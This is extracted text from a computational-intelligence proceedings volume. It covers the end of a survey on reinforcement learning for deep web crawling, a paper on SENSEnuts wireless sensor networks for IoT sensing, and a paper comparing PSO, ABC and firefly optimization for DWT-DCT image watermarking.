Thirty-one of the seventy-seven research papers have been studied for this survey. No survey paper exists that covers RL-based techniques for DWC, which is the main motivation behind this survey. This paper reviews the RL-based techniques that have been successfully applied to DWC. Table 1 shows the various DWC techniques based on RL, together with a comparative analysis, their strengths, and their future scope. RL-based techniques such as Q-value-based learning and learning automata have already been explored in the literature. Various ensemble approaches, i.e., term frequency–inverse document frequency (TF-IDF), RL with word2vec, Cascading Style Sheets (CSS) visual properties with RL, and an agent coordinator architecture, were also used to traverse the deep web. Kumar et al. proposed an algorithm based on learning automata to find deep web pages [14]; this work, with query optimization, can also be used to crawl the ranked deep web. Kaelbling et al. explained the strengths and weaknesses of various models for the reward function, such as the average reward model, finite horizon, infinite horizon, infinite-horizon discounted model, normalized discounted cumulative gain, and Q-value-based approximation [5]. The selection of model also depends on the type of RL technique. There is much scope for RL-based techniques in DWC, as discussed in Section 5.
Table 1 (continued)

| S. No | Strength | Dataset | Metrics | Future scope |
|-------|----------|---------|---------|--------------|
| 8 | Patil et al. presented the crawler architecture to explore the search form using Q-learning with an ε-greedy approach [31] | IndiaBix, Telenor | Harvest rate, number of searchable forms | The greedy approach can be improved |
elements corresponding to the deep web. Form modeling is a tedious task consisting of label identification and label semantics; it can be implemented with RL-based techniques. Transfer learning can be combined with RL to generate relevant keywords: these keywords are filled into the search forms, more results are retrieved, and the environment generates more reward. No work has been done on sampling strategies for information extraction over the ranked deep web. Transfer learning with RL can help to find a high-quality document sample for the ranked deep web, which leads to minimum query submissions and maximum coverage; thus, the environment gives more reward and leads to the optimal policy. Query selection for the deep web is a challenging task, and finding the optimal query set is an unsolved problem.
This paper surveys various techniques wherein RL has been successfully applied to the deep web. Different survey papers have been studied to explore the research gaps in the literature. RL-based techniques in the domain of DWC are still in their infancy; thus, they have immense potential for research in the field of DWC. A comparative analysis of various techniques with their future scope has been presented. Some RL-based techniques have not been applied to DWC yet. Researchers can explore techniques such as Deep Deterministic Policy Gradient, REINFORCE (Monte Carlo policy gradient), REINFORCE with baseline, and deep RL techniques such as Deep Q-Network and actor-critic-based learning. These techniques can help to solve the challenges of DWC. Designing the reward function is a crucial part of RL. Various techniques, i.e., imitation learning, replay buffer, preference-based RL, inverse RL, etc., can be used to define the reward function. Imitation learning or inverse RL may help to design the reward function when a reward function definition is not available.
References
1. Bergman, M. K. (2001). White paper: The deep web: Surfacing hidden value. Journal of
Electronic Publishing, 7(1).
2. Hernández, I., Rivero, C. R., & Ruiz, D. (2019). Deep web crawling: A survey. World Wide
Web, 22(4), 1577–1610.
3. Zheng, Q., Wu, Z., Cheng, X., Jiang, L., & Liu, J. (2013). Learning to crawl deep web.
Information Systems, 38(6), 801–819.
4. Mishra, A., Mattmann, C. A., Ramirez, P. M., & Burke, W. M. (2018). ROACH: Online apprentice critic focused crawling via CSS cues and reinforcement. In Proceedings of the ACM Conference on Knowledge Discovery and Data Mining (KDD 2018), August (pp. 1–9).
5. Kaelbling, L. P., Littman, M. L., & Moore, A. W. (1996). Reinforcement learning: A survey. Journal of Artificial Intelligence Research, 4, 237–285.
6. Moraes, M. C., Heuser, C. A., Moreira, V. P., & Barbosa, D. (2013). Prequery discovery
of domain-specific query forms: A survey. IEEE Transactions on Knowledge and Data
Engineering, 25(8), 1830–1848.
7. Kantorski, G. Z., Moreira, V. P., & Heuser, C. A. (2015). Automatic filling of hidden web
forms. ACM SIGMOD Record, 44(1), 24–35.
8. Saini, C., & Arora, V. (2016). Information retrieval in web crawling: A survey. In 2016 Inter-
national Conference on Advances in Computing, Communications and Informatics (ICACCI)
(pp. 2635–2643).
9. Kumar, M., Bhatia, R., & Rattan, D. (2017). A survey of web crawlers for information retrieval.
WIREs Data Mining Knowledge Discovery, 7(6), e1218.
10. Li, S., Chen, C., Luo, K., & Song, B. (2019). Review of deep web data extraction. In 2019
IEEE Symposium Series on Computational Intelligence (SSCI) (pp. 1068–1070).
11. Google Scholar. 2020. [Online]. Available http://scholar.google.com/. Accessed 30 December
2020.
12. Raghavan, S., & Garcia-Molina, H. (2001). Crawling the hidden web. In 27th VLDB
Conference—Roma, Italy (pp. 1–10).
13. Sutton, R. S., & Barto, A. G. (1998). Reinforcement learning: An introduction.
14. Kumar, M., & Bhatia, R. (2018). Hidden webpages detection using distributed learning
automata. Journal of Web Engineering, 17(3–4), 270–283.
15. Wirth, C., Akrour, R., Neumann, G., & Fürnkranz, J. (2017). A survey of preference-based reinforcement learning methods. Journal of Machine Learning Research, 18(136), 1–46.
16. Shah, S., Patel, S., & Nair, P. S. (2014). Focused and deep web crawling—A review.
International Journal of Computer Science and Information Technologies, 5(6), 7488–7492.
17. Akilandeswari, J., & Gopalan, N. P. (2007). A novel design of hidden web crawler using
reinforcement learning based agents. In Advanced parallel processing technologies (Vol. 4847,
pp. 433–440). Springer.
18. Marin-Castro, H. M., Sosa-Sosa, V. J., Martinez-Trinidad, J. F., & Lopez-Arevalo, I. (2013).
Automatic discovery of web query Interfaces using machine learning techniques. Journal of
Intelligent Information System, 40(1), 85–108.
19. Chakrabarti, S., Punera, K., & Subramanyam, M. (2002). Accelerated focused crawling through
online relevance feedback. In Proceedings of 11th International Conference on World Wide
Web, WWW’02 (pp. 148–159).
20. Sharma, D. K., & Sharma, A. K. (2011). A QIIIEP based domain specific hidden web crawler. In
Proceedings of the International Conference & Workshop on Emerging Trends in Technology—
ICWET ’11 (pp. 224–227).
21. Singh, L., & Sharma, D. K. (2013). An approach for accessing data from hidden web using
intelligent agent technology. In 2013 3rd IEEE International Advance Computing Conference
(IACC) (pp. 800–805).
22. Alzubi, O. A., Alzubi, J. A., Ramachandran, M., & Al-shami, S. (2020). An optimal
pruning algorithm of classifier ensembles: Dynamic programming approach. Neural Computer
Applications, 6.
23. Zhang, Z., Du, J., & Wang, L. (2013). Formal concept analysis approach for data extraction
from a limited deep web database. Journal of Intelligent Information System, 41(2), 211–234.
24. Pavai, G., & Geetha, T. V. (2017). Improving the freshness of the search engines by a
probabilistic approach based incremental crawler. Information Systems Frontiers, 19(5),
1013–1028.
25. Pratiba, D., Shobha, G., Lalithkumar, H., & Samrudh, J. (2017). Distributed web crawlers using
hadoop. International Journal of Applied Engineering Research, 12(24), 15187–15195.
26. Ahmed Md. Tanvir, M. C. (2019). Design and implementation of web crawler utilizing
unstructured data. Journal of Korea Multimedia Society, 22(3), 374–385.
27. Gupta, D., Rodrigues, J. J. P. C., Sundaram, S., Khanna, A., Korotaev, V., & De Albuquerque,
V. H. C. (2018). Usability feature extraction using modified crow search algorithm: A novel
approach. Neural Computer Application, 6.
28. Murali, R. (2018). An intelligent web spider for online e-commerce data extraction. In 2018
Second International Conference on Green Computing and Internet of Things (ICGCIoT)
(pp. 332–339).
29. Tahseen, I., & Salim, D. (2018). A proposal of deep web crawling system by using breath-first
approach. Iraqi Journal of Information and Communications Technology, 48–61.
30. Tanvir, A. M., Kim, Y., & Chung, M. (2019). Design and implementation of an efficient web
crawling using neural network. In Advances in computer science and ubiquitous computing
(pp. 116–122). Springer.
31. Patil, Y., & Patil, S. (2016). Implementation of enhanced web crawler for deep-web interfaces.
International Research Journal of Engineering and Technology, 2088–2092.
Wireless Sensor Network for Various
Hardware Parameters for Orientational
and Smart Sensing Using IoT
Abstract SENSEnuts is a very advanced platform that offers user-friendly features such as easy-to-use APIs, user-modifiable source code, and a GUI, and helps in real-time analysis of sensor data. Another advantage of SENSEnuts is the connection of wireless devices at a very low data rate and low power consumption. The data sensed from the sensor nodes is transferred to the Internet through the SENSEnuts Wi-Fi module. The data is usually stored in the cloud, from where we can easily analyze and monitor the sensed raw data. Using the SENSEnuts hardware packages, such as the GAP, HTP, and TL sensor packages used in this paper, we can overcome the conventional difficulties of hardware implementation, design, and software rectification for orientational sensor hardware that uses an accelerometer for analyzing different planes and motions, as well as for humidity, pressure, and temperature sensing, without cumbersome hardware implementations; this can be used in smart agriculture and smart home systems. The work carried out proves to be cost effective with high accuracy and precision, overcoming conventional hardware implementations, with live updates from the sensor nodes to the senslive GUI for accurate and precise detection and usage.
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 301
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_25
302 M. D. Gazi et al.
1 Introduction
Internet of Things (IoT), the general term used in the new era of communication, refers to cases where network connectivity and computational capability are extended to sensor nodes and actuators, allowing data-driven exchange of information without any external intervention. In IoT, any node connected to the network is termed smart, as it contains inbuilt intelligence that helps it to perform different kinds of tasks by itself. A wireless sensor network (WSN) has an added advantage over other networks due to its ability to sense remote locations where monitoring of data is otherwise not possible. IoT has attracted considerable attention in a wide range of applications. The major concerns in today's world are time and accuracy: many applications throughout the world need continuous attention, e.g., the temperature of a boiler room needs to be continuously monitored, and an alarm should be raised if the temperature goes out of the margin line. For such purposes, SENSEnuts is one of the best platforms, as it enables us to continuously gather real-time data through sensor nodes in an accurate manner. However, in order to store the data and perform post-analysis of the data coming from the sensor nodes for further applications, the data needs to be stored in a cloud.
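The boiler-room example above amounts to a simple threshold watch over a stream of readings; the sketch below is illustrative, and the margin values and reading source are assumptions, not SENSEnuts APIs.

```python
def monitor(readings, low=15.0, high=35.0):
    """Yield an alarm message whenever a reading leaves the [low, high] margin."""
    for t, value in enumerate(readings):
        if not (low <= value <= high):
            yield f"t={t}: temperature {value} C out of margin"

# Example stream: the third and fourth readings fall outside the margin.
alarms = list(monitor([20.0, 30.0, 36.5, 10.0]))
```

In a real deployment the readings would arrive from the sensor nodes over the network, and the alarm messages would be pushed to the cloud dashboard instead of collected in a list.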
This work is based on wireless communication of sensor networks and the combination of real-time data with IoT. In [1], the authors proposed triaxial accelerometer-based human detection using perceptron algorithms and neural coding models; that model requires extensive neural algorithm coding for three-plane position sensing, which can be done far more easily using the SENSEnuts GAP sensor package and its GUIs, as in the proposed work. Khan et al. proposed triaxial accelerometer-based activity sensing using augmented features and a hierarchical recognizer [2]. In [3], the authors proposed a web-based sewage monitoring system built on a set of hardware containing the TL sensor. Estrada-Lopez et al. proposed a smart soil-parameter estimation system using autonomous wireless sensor networks with a dynamic power strategy [4]; there, the soil parameters suitable for crop growth are chosen using a deployed wireless sensor network consisting of nodes and sensors. The work in [5] proposed an energy-aware, corona-level-based routing approach for IEEE 802.15.4-based wireless sensor networks. Agarwal et al. explained the design and implementation of medium access control-based routing on a real wireless sensor network testbed [6].
In the above-mentioned works, the authors used sensing technologies such as RFID, PIC, GSM, Raspberry Pi, and ZigBee, along with augmented reality-based coding, for activity sensing using conventional accelerometers only [6-8]. With those heavily coded devices, they were able to control and analyze the temperature, humidity, and pressure required for optimal agricultural usage. These papers provide an idea for using a WSN with the SENSEnuts platform for activity, temperature, humidity, and pressure sensing for agricultural and other user applications [8-10]. They also motivate the deployment of user-specific IoT network systems, for which the SENSEnuts platform is best suited owing to its node-to-node communication, robustness, and readily available GUI [10-14]. The platform is also very economical and can be used for research purposes [14-17].
In this section, the basic WSN system architecture using the SENSEnuts platform, as used in this work, is described. The easy-to-use graphical user interfaces of SENSEnuts make it in demand for industrial and research purposes. The WSN system architecture is shown in Fig. 1, which gives an accurate top-to-bottom hierarchy of how the different sensor nodes are connected to each other, with highly precise, user-friendly, auto-updating GUIs. Because the WSN is modular in design, it delivers seamlessly integrated performance with fast node-to-node communication; the modular design also makes it easy to install and fast to deploy. The WSN architecture can be easily understood from Table 1.
The sensor module design structure proposed in this work is shown in Fig. 1. The lowermost part is a 5 V battery. Above the battery sits the radio module, which contains a PCB antenna and a microcontroller. Above the radio module, the sensor nodes are attached. There is also a USB gateway module, also known as the extender module, which is usually attached on top. Specifications for each module (shown in Fig. 2) are given below.
Extender: It extends the microcontroller to other sensor devices and is also used to debug hardware and access the SPI, UART, ADC, and I2C interfaces.
Radio module: The microcontroller used here is the JN5168, used for wireless transmission of real-time data. It follows the IEEE 802.15.4 standard with a low-power 32-bit RISC controller clocked at 32 MHz, with 32 kB of RAM, 256 kB of flash memory, and 4 kB of EEPROM. Security in this module is of the AES type, with a receive current of 17 mA, a transmit current of 15 mA, and a controllable transmission power ranging from −31 to +2.5 dBm.
Light and temperature sensor: The temperature sensing range of this sensor is from −24 to 80 °C with a resolution of 12 bits. The light sensing range, measured in lux, is from 3 to 63 k lux with a resolution of 16 bits, excellent IR and UV rejection, and a 1.5 µA shutdown current.
Temperature, pressure, and humidity sensor: The sensors used here measure relative humidity and pressure with resolutions of 14 and 24 bits, respectively, and 0.04% RH resolution.
Soil moisture sensor: This sensor measures soil moisture by measuring the change in equivalent resistance between the two probes of the sensor.
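As an illustration of this resistance-based principle, the mapping from probe resistance to a moisture estimate can be sketched as below; the calibration constants `R_DRY` and `R_WET` are hypothetical placeholders for illustration only, not SENSEnuts specifications.

```python
# Hypothetical sketch: probe resistance falls as soil moisture rises,
# so the mapping is inverted and clamped to a calibration range.
R_DRY = 20000.0  # assumed resistance (ohms) of fully dry soil
R_WET = 1000.0   # assumed resistance (ohms) of saturated soil

def moisture_percent(r_ohms, r_dry=R_DRY, r_wet=R_WET):
    """Map equivalent probe resistance to a 0-100 % moisture estimate."""
    r = min(max(r_ohms, r_wet), r_dry)  # clamp to calibration range
    return 100.0 * (r_dry - r) / (r_dry - r_wet)
```

In a deployment, the two constants would come from calibrating the probe in dry and saturated soil samples.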
GAP sensor: It is used for overall motion and positioning detection. It consists of a GPS receiver, a transceiver, an accelerometer, a PIR sensor, and an antenna, with 14-bit and 8-bit digital outputs, dynamically selectable full-scale ranges of 2g, 4g, and 8g, and a built-in PIR with extremely low current consumption.
Wi-Fi gateway system: It uses an SPI interface. Band coverage is 2.4 GHz with the 802.11 b/g/n Wi-Fi standard. It contains a serial flash system with a Broadcom BCM43362 single-band chip supporting the Wi-Fi security modes Open, WEP, WPA, and WPA2-PSK, with 1 MB of flash memory, 128 kB of SRAM, and a Wi-Fi power-save current of 0.77 mA.
3.1 Overview
Figure 3 shows how the sensor data is sent to the senselive network and shows all the connected devices used in the network, such as the sensor nodes, PAN coordinator, and Wi-Fi module. Each sensor node has a different MAC ID. The setup also includes a gateway module that provides connectivity for the overall IoT setup. The SENSEnuts platform works on the IEEE 802.15.4 standard, which offers user-efficient parameters such as low bandwidth, low battery usage, and a large communication range. The data coming from the sensor nodes is carried through the network to the senselive user interface, where it is stored and analyzed for future applications (Fig. 9).
The fundamental unit here consists of the sensor nodes, or modules, of the SENSEnuts platform, which include the GAP, TL, and HTP sensors. An external battery-powered radio module is installed below the two sensor nodes, with a coordinator set up in the middle of the two sensor nodes. A PAN coordinator is also installed; it has a radio module and a Wi-Fi module attached for transmission and reception. The PAN coordinator associates with the coordinator, receives all the information, and forwards it to the Wi-Fi module for wireless transmission. The functionality of the PAN coordinator and coordinator is different, but the hardware setup for both is the same; the functional difference lies in whether the node is programmed as a PAN coordinator or a coordinator. To program these modules, the drivers are installed after the gateway module of the SENSEnuts platform is plugged in. After the code is built and compiled into a hex file, a bin file is generated and flashed into the device. The SENSEnuts GUI is then opened to display the raw data coming from the sensor nodes; once the particular sensor node is programmed, the PAN coordinator and coordinator are connected. Once they are associated, the coordinator starts sending raw data wirelessly to the PAN coordinator, and the live readings from the sensor nodes can easily be seen. The MAC addresses of the attached sensor nodes are also checked at the beginning of the setup.
The specifications of the hardware and software used are as follows.
The data coming from the real-time sensor nodes can be verified in senselive, where it is updated on a real-time basis. Different sets are made according to their parameters and usability, such as the GAP, HTP, and TL sensors, and the data coming from these sensors is continuously updated on the senselive platform. The GAP sensor output is given in Figs. 4, 5, 6, 7, and 8; that of the HTP and TL sensors can be similarly obtained using the senselive GUI. The changes in position, temperature, light, humidity, and pressure seen on the senselive platform are shown in Figs. 4, 5, 6, 7, and 8.
Figures 4, 5, 6, 7, and 8 show this data on the senselive GUI of the GAP sensor node. The GAP sensor node gives live readings from the actual connected node and can be used to sense real-time readings that help detect object acceleration in the x, y, and z planes. Movement of the GAP sensor changes the real-time readings in the three planes of movement, which also helps in detecting the plane of motion of the object. The SENSEnuts GAP sensor is not only beneficial over conventional triaxial accelerometers for detecting the motion of a moving object in three axis planes, which otherwise requires a great deal of augmented and neural network-based design and coding for live updating, but also proves cost efficient and low power, with real-time updating of readings to the open-source cloud. The GAP sensor from the SENSEnuts package could be used for real-time updating and monitoring services in defense technology. Similarly, the data can be shown on the senselive GUI for the TL sensor, which gives real-time updates of temperature and light; in this way, the TL sensor data can help the user with regular climatic updates for agricultural usage. The data coming from the TL sensor node is likewise updated on the real-time GUI interface of SENSEnuts, making it user-friendly and low power with real-time updating. Similarly, the readings coming from the HTP sensor node are updated in real time on the senselive GUI for analysis and usage (Figs. 10, 11, 12, 13 and 14).
4.2 Monitoring
The real-time sensor nodes are connected to the coordinators, which are an essential part of the monitoring process. The GAP sensor node gives the values of change in orientational acceleration and positioning, which can be used for real-time activity sensing. Similarly, the TL sensor nodes give real-time readings for temperature and light sensing, which could prove beneficial for smart home technology, with live updating from the TL sensor node to the user interface. Another important part of the SENSEnuts platform is the radio module, which sends data to the PAN coordinator. The PAN coordinator, with the help of the Wi-Fi module, then displays the live readings from the real-time sensors on the senselive GUI. In this way, the method is cost effective, uses less power, and proves helpful for remote monitoring.
5 Conclusion
In this work, we have connected the sensor world to the IoT in a hassle-free manner, with high precision and accuracy, using a wireless sensor network (WSN). The data coming from the real-time sensors can be easily sensed and used for future applications. The proposed work proved hassle-free compared with the conventional triaxial accelerometric three-plane detection system, with far less computational complexity, no neural network modeling, easy live updating on the senselive GUI, and easy forwarding to the cloud for further usage. Small changes in temperature, acceleration, luminosity, humidity, and pressure were detected with only a small delay at the cloud end when updating the real-time data from the sensor nodes to the senselive GUI. In this way, a wireless sensor network using the SENSEnuts hardware package and its GUIs proves very user-friendly, cost effective, and low power, and gives an edge over conventional hardware technologies, whether for detecting object acceleration and motion or for smart home systems that detect and monitor light and temperature. In future, the limited range can be improved by using multi-hop communication and suitable routing protocols so that data packets can reach the destination easily, and the real-time senselive GUI data can also be sent to any cloud service for use over the Internet from distant places.
References
1. Jalal, A., Majid, A. K. Q., & Sidduqi, M. A. A triaxial-based human motion detection for ambient smart home systems. In IBCAST. https://doi.org/10.1109/IBCAST.2019.8667183
2. Khan, A. M., Lee, Y. K., Lee, S. Y., & Kim, T. S. (2010). A triaxial accelerometer-based
physical-activity recognition via augmented-signal features and a hierarchical recognizer. IEEE
Transactions on Information Technology in Biomedicine, 14(5), 1166–1172. https://doi.org/10.
1109/titb.2010.2051955
3. Haswani, N. G., & Deore, P. J. (2018). Web-based realtime underground drainage or sewage
monitoring system using wireless sensor networks. In 2018 Fourth International Conference
on Computing Communication Control and Automation (ICCUBEA) (pp. 1–5)
1 Introduction
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 315
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_26
316 P. Garg and R. Rama Kishore
which can be used for authentication purposes. A watermark can be visible to end-users; for example, when creating a video with an application, the application may add its logo over that video. But such visible watermarks can be deleted quickly using Photoshop, and they also degrade the quality of the content. Most people therefore use invisible watermarks, which cannot be seen by anyone yet still serve their purpose. The basic idea of watermarking is to add an image, text, logo, or other information to the cover data to provide intellectual property rights over that content. This logo can be extracted when required [1]. While adding a watermark to the cover content, the original image's quality should not degrade, and the watermark should be recoverable after various attacks are applied to the content [2, 3].
There are various watermarking applications, such as copyright protection, broadcast monitoring, fingerprinting, and medical applications [4-7], which attract researchers to this field. Nowadays, watermarking is being used in the medical field to protect confidential patient information. Watermarking can be performed in the spatial domain [8-10] or in the frequency domain [11-14], but frequency-domain techniques are now mostly used because they provide better robustness for the embedded watermark. To provide a good balance between imperceptibility and robustness, combinations of frequency-domain techniques such as DFT and DCT [15]; DFT, DWT, and SVD [16]; and DWT and DCT [17] are used. The quality of a watermarking scheme (its imperceptibility) is measured by its PSNR [18] and MSE values, while its robustness against various attacks is measured using normalized correlation (NC) [19] and bit error rate (BER). It is very hard for an algorithm to maintain the original image's quality while also behaving well under various attacks, so an optimization procedure is required to achieve this objective. One class of techniques for this is nature-inspired optimization; as the name suggests, these algorithms are inspired by the natural behavior of species such as honey bees, ants, cuckoos, and bats. Many nature-inspired algorithms have been used in the watermarking field [20-24] to find this balance and maintain the quality of the image.
This paper studies and analyzes the behavior of these meta-heuristic algorithms in the watermarking procedure. For this purpose, a watermark is added to the cover image using a hybrid frequency-domain scheme with 1-level DWT and DCT. It is then optimized using three different meta-heuristic algorithms: firefly, artificial bee colony (ABC), and particle swarm optimization (PSO). These algorithms are used to find the strength factor in the watermark embedding procedure, which is crucial to the tradeoff between quality and robustness. The proposed scheme is a blind technique that does not require the original image or watermark at extraction time, making it more secure.
The rest of the paper is organized as follows: Sect. 2 describes various works on optimization of the watermarking procedure; Sect. 3 describes the proposed embedding and extraction algorithms; Sect. 4 discusses the experimental results; Sect. 5 presents the comparative analysis; and Sect. 6 concludes the proposed work and outlines future directions.
Comparative Analysis: Role of Meta-Heuristic Algorithms … 317
2 Related Work
3 Proposed Technique
The proposed scheme is a blind watermarking technique that provides the robustness, imperceptibility, and security characteristics of digital watermarking. In this paper, a grayscale image of size 512*512 is taken as the input or cover image, on which the watermark logo is embedded using the DWT technique. DWT converts an image into hierarchies of information in both the spatial and frequency domains [36]. First, DWT is applied to the cover image, and then it is applied again to the LL sub-band of size 128*128; the LL1 sub-band is then chosen to embed the watermark. The LL sub-band is chosen for embedding because it represents the image's low-resolution content. DCT (Discrete Cosine Transform), a linear orthogonal transformation widely used in digital image processing [37], is then applied to the LL1 sub-band. The watermark logo is scrambled using the Arnold transform and then embedded into the DCT of the LL1 sub-band to provide security to the scheme. The proposed scheme is optimized using multi-objective-function-based meta-heuristic algorithms: PSO, ABC, and the firefly algorithm. The proposed method is a blind watermarking technique because it requires only the embedded watermark image at the time of extraction, making it a secure scheme.
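The Arnold-transform scrambling step can be sketched as follows; this is a generic cat-map implementation on a plain list-of-lists N x N image, not the authors' code.

```python
def arnold_scramble(img, iterations=1):
    """One forward Arnold cat-map pass per iteration on an N x N image:
    (x, y) -> ((x + y) mod N, (x + 2y) mod N)."""
    n = len(img)
    for _ in range(iterations):
        out = [[0] * n for _ in range(n)]
        for x in range(n):
            for y in range(n):
                out[(x + y) % n][(x + 2 * y) % n] = img[x][y]
        img = out
    return img

def arnold_unscramble(img, iterations=1):
    """Inverse map: (x, y) -> ((2x - y) mod N, (y - x) mod N)."""
    n = len(img)
    for _ in range(iterations):
        out = [[0] * n for _ in range(n)]
        for x in range(n):
            for y in range(n):
                out[(2 * x - y) % n][(y - x) % n] = img[x][y]
        img = out
    return img
```

The iteration count acts as the secret key: only someone who knows it can unscramble the extracted watermark, which is what gives the scheme its security property.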
Table 1 shows the initial parameters used in all three optimization algorithms; standard parameters such as population size and iteration count are the same for all three. The watermark embedding and extraction algorithm is shown in Algorithm 4. This section describes the algorithm used for embedding the watermark in the grayscale image of size 512*512 and its extraction process. All experiments are performed with the Lena image as the cover image, and a logo image of size 64*64 is used as the watermark. Extraction of the watermark is blind, as it requires only the embedded image and not the original cover or watermark image; only the key used to encrypt the watermark is needed to decrypt it after extraction from the embedded image. The complete process of watermark embedding and extraction is shown in Fig. 1. During embedding, different scaling factors are used, calculated using the three meta-heuristic techniques.
Algorithm 4: Steps of proposed approach
Embedding:
1. Read the cover image of size m*n and perform 1-level DWT on it to convert it into 4 equal-sized sub-bands:
   [LL1, HL1, LH1, HH1] = DWT(I)m,n
   where LL1, HL1, LH1, and HH1 are the 4 sub-bands arranged in increasing order of frequency, and (I)m,n is the original cover image of size m*n.
2. Select the LL1 sub-band of the host image, as it carries most of the cover image information, and divide it into blocks of size 4*4.
3. Perform block-wise DCT on every block obtained in step 2.
4. Read the 64*64 watermark image and scramble it using the Arnold transform to provide security to the watermark image.
5. Convert the scrambled watermark into a vector so that bitwise watermark embedding can be performed on each 4*4 block.
6. Choose a location in each block, based on its frequency content, at which to embed the watermark. Watermark bits are embedded by adding or subtracting a watermark strength factor obtained from the meta-heuristic algorithms. This embedding factor is calculated using the firefly, PSO, and ABC algorithms and is then used, one algorithm at a time, for embedding the watermark bits:
   If SW(i) = 1: bx(i,j) = bx(i,j) - SF;
   else if SW(i) = 0: bx(i,j) = bx(i,j) + SF;
   where bx(i,j) is the location selected in the block for embedding and SF is the robustness factor or embedding strength factor calculated using the artificial bee colony, firefly, and particle swarm optimization techniques. The process of computing the embedding factor with these algorithms is described in Sect. 3. The locations used for embedding serve as key values at watermark extraction time.
7. Combine the blocks back into a 256*256 sub-band and perform the inverse DCT (IDCT) on it to return the image to the spatial domain.
8. Combine the embedded LL1 sub-band with the other sub-bands by applying IDWT to obtain the watermarked image.
Extraction:
1. Read the watermarked image and perform 2-D DWT on it:
   [LL1, HL1, LH1, HH1] = DWT(Ewk)
2. Perform block-wise DCT on the LL1 sub-band and divide it into blocks of size 4*4, as in the embedding algorithm.
3. Find the pixel value at each selected block location used for embedding:
   if pix >= 0: wm(i,j) = 0;
   else if pix < 0: wm(i,j) = 1;
   where wm(i,j) is the pixel value of the watermark image at location (i, j).
4. Combine all the results obtained in step 3 into a vector. The image obtained is the scrambled watermark image; it is unscrambled using the key used when embedding it, giving the extracted watermark image. This is then compared with the original watermark to check robustness and imperceptibility.
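The sign-based rules in embedding step 6 and extraction step 3 can be illustrated with a minimal sketch; the coefficient values and the strength factor `SF` below are hypothetical, and the sketch assumes the selected DCT coefficients are small relative to `SF`, which is what makes the sign decode the bit.

```python
SF = 10.0  # embedding strength factor; in the paper it is tuned by PSO/ABC/firefly

def embed_bits(coeffs, bits, sf=SF):
    """Bit 1 -> subtract sf (drives the coefficient negative);
    bit 0 -> add sf (drives it positive)."""
    return [c - sf if b == 1 else c + sf for c, b in zip(coeffs, bits)]

def extract_bits(coeffs):
    """Blind extraction: a non-negative coefficient decodes to 0, negative to 1."""
    return [0 if c >= 0 else 1 for c in coeffs]
```

Because extraction needs only the coefficient signs and the embedding locations (the key), neither the original cover image nor the original watermark is required, which is what makes the scheme blind.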
The term perceptual quality means that once the watermark is embedded into the original image, it should not be visible to the end-user, and the embedded image should look like the original image [38, 39]. Various measures are used for this, such as MSE (Mean Square Error) and PSNR (Peak Signal-to-Noise Ratio). PSNR is one of the most useful measures because it gives the statistical difference between the original cover image and the watermarked image [14]. The higher the PSNR value, the more invisible the watermark. Generally, a PSNR value of 27 is acceptable; a PSNR value greater than 35 is achieved for all the techniques used here, as shown in Table 1, proving that the proposed scheme is highly imperceptible.
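The two measures can be computed as below; this is the standard textbook formulation, shown on flat 8-bit pixel lists for brevity.

```python
import math

def mse(orig, marked):
    """Mean squared error between two equal-length 8-bit pixel sequences."""
    return sum((a - b) ** 2 for a, b in zip(orig, marked)) / len(orig)

def psnr(orig, marked, peak=255.0):
    """Peak signal-to-noise ratio in dB; higher means a less visible watermark."""
    e = mse(orig, marked)
    return float('inf') if e == 0 else 10.0 * math.log10(peak ** 2 / e)
```

For example, a uniform one-level error on 8-bit pixels (MSE = 1) corresponds to a PSNR of about 48 dB, well above the 35 dB reported for the scheme.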
Robustness refers to the watermark's capacity to survive attacks; it is measured as the similarity between the original watermark image and the extracted watermark. One of the measures used is BER (Bit Error Rate), which calculates the error rate between the original and extracted watermark images. The most common measure of watermark robustness is NC (Normalized Correlation) [40], which measures the correlation between the original and extracted watermark images; the greater the correlation between these two images, the closer the NC value is to 1. In this technique, both NC and BER values are calculated for all the attacks to measure the scheme's robustness. The NC values against various attacks are shown in Table 3, and the BER values in Table 4. An NC value greater than 0.9 is achieved for all the optimization techniques applied.
5 Comparative Analysis
The results of these optimization techniques are compared with each other in terms of NC and BER values, as shown in Figs. 2, 3, 4, and 5. The results of the three algorithms differ even though they all perform the same task. From all the experiments, we can summarize that the firefly algorithm is very efficient at solving complex problems and converges faster than the PSO and artificial bee colony algorithms; here, convergence means that the algorithm reaches the optimized result more quickly than the other two. The reason for its faster convergence is that the firefly algorithm's parameters can be tuned to control the randomness as the iterations proceed. The time complexity of the firefly algorithm is better than that of the PSO algorithm, since in PSO
Table 3 NC values of extracted watermark images using various optimization techniques after performing various attacks

S. No. | Attack type | Lena image (PSO / ABC / Firefly) | Pepper image (PSO / ABC / Firefly)
1 | Median filtering (3*3) | 0.9820 / 0.9607 / 0.9607 | 0.9995 / 1 / 0.9995
2 | Average filtering (3*3) | 0.9684 / 0.9420 / 0.9420 | 0.9973 / 0.9995 / 0.9989
3 | Resizing | 0.9814 / 0.9587 / 0.9587 | 0.9995 / 0.9995 / 0.9995
4 | Rotation (20°) | 0.9902 / 0.9883 / 0.9883 | 1 / 1 / 1
5 | Histogram equalization | 0.9892 / 0.9793 / 0.9793 | 0.9979 / 0.9989 / 0.9984
6 | Gaussian noise (v = 0.001) | 0.9888 / 0.9424 / 0.9500 | 0.9973 / 0.9989 / 0.9995
7 | Wiener filter (2*2) | 0.9904 / 0.9689 / 0.9689 | 0.9989 / 1 / 1
8 | Gaussian average filtering | 0.9936 / 0.9824 / 0.9824 | 0.9995 / 1 / 1
9 | Average filtering (3*3) | 0.9720 / 0.9444 / 0.9444 | 0.9973 / 0.9995 / 0.9995
10 | Salt and pepper noise (0.001) | 0.9946 / 0.9752 / 0.9788 | 0.9872 / 0.9979 / 0.9931
11 | Sharpening (0.8) | 0.9968 / 0.9909 / 0.9909 | 1 / 1 / 1
12 | Speckle noise (0.001) | 0.9952 / 0.9872 / 0.9846 | 1 / 1 / 1
Average value | | 0.9868 / 0.9683 / 0.9690 | 0.9978 / 0.9995 / 0.9990
